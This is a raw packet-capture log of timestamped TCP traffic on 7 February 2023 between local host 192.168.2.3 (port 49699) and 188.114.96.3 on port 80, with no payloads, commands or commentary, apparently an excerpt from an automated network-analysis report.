                                                                                    Feb 7, 2023 19:45:01.887725115 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887753010 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887763977 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887794971 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887803078 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887820005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887841940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887867928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887882948 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887909889 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887923002 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887950897 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.887978077 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.887990952 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888019085 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888030052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888056993 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888073921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888103008 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888134956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888144970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888160944 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888185024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888211012 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888226032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888252020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888267994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888298035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888323069 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888338089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888362885 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888377905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888408899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888433933 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888448954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888474941 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888489008 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888513088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888530016 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888555050 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888576984 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888606071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888633013 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888645887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888669968 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888683081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888708115 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888724089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888747931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888763905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888793945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888823032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888835907 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888854027 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888875961 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888906956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888920069 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888948917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.888976097 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.888987064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889012098 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889027119 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889054060 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889070034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889100075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889125109 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889138937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889164925 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889182091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889208078 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889225006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889256001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889281988 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889297962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889323950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889334917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889360905 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889374971 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889401913 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889417887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889446020 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889472008 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889487028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889511108 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889525890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889550924 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889565945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889595032 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889610052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889641047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889662027 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889662027 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889687061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889713049 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889730930 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889767885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889794111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889807940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889832973 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889847040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889872074 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889889956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889919043 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889944077 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889959097 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.889983892 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.889997959 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890022993 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890041113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890065908 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890083075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890111923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890137911 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890152931 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890177011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890192986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890222073 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890233994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890249014 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890271902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890302896 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890325069 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890345097 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890376091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890400887 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890419960 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890444994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890461922 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890486956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890506983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890537024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890561104 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890578032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890602112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890616894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890641928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890659094 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890688896 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890743017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890753984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890753984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890769005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890799046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890827894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890852928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890870094 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890893936 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.890907049 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890933990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890964031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.890988111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.891005039 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891057968 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.891072035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891098976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891124010 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891150951 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891179085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891206026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891232967 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.891855955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.895639896 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895673990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895700932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895725012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895751953 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895776033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895803928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.895842075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895870924 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.895883083 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895915985 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895924091 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.895944118 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.895962954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.895994902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896003962 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896024942 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896042109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896075964 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896084070 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896106005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896126986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896156073 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896186113 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896198988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896223068 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896240950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896265984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896280050 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896311998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896320105 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896338940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896357059 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896389961 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896398067 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896416903 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896435976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896466970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896475077 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896500111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896528006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896541119 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896564960 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896579027 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896605015 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896615982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896642923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896676064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896687031 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896735907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896764040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896778107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896797895 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896817923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896852016 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896862030 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896889925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896924019 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896933079 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.896960974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.896990061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897005081 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897005081 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897020102 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897046089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897072077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897083998 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897104979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897121906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897149086 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897164106 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897192955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897222042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897252083 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897264957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897281885 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897303104 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897330999 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897342920 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897362947 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897381067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897408962 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897425890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897455931 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897485018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897512913 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897546053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897557020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897557020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897557020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897572994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897598982 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897634983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897644997 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897672892 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897701025 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897718906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897777081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897809982 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.897905111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897941113 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.897941113 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.904218912 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909197092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909240007 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909271955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909301996 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909326077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909352064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909379005 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909408092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909426928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909457922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909457922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909476995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909507990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909544945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909553051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909581900 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909646988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909676075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909704924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909717083 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909744978 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909778118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909785986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.909811974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.909840107 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.911878109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.911922932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.911955118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.911966085 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.911998987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912024021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912054062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912070036 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912096024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912127018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912137032 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912164927 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912184000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912211895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912225008 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912250042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912278891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912292957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912322998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912348986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912363052 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912386894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912415981 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912429094 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912456989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912482977 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912496090 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912519932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912549019 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912560940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912587881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912617922 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912631989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912662029 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912693024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912708044 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912736893 CET8049699188.114.96.3192.168.2.3
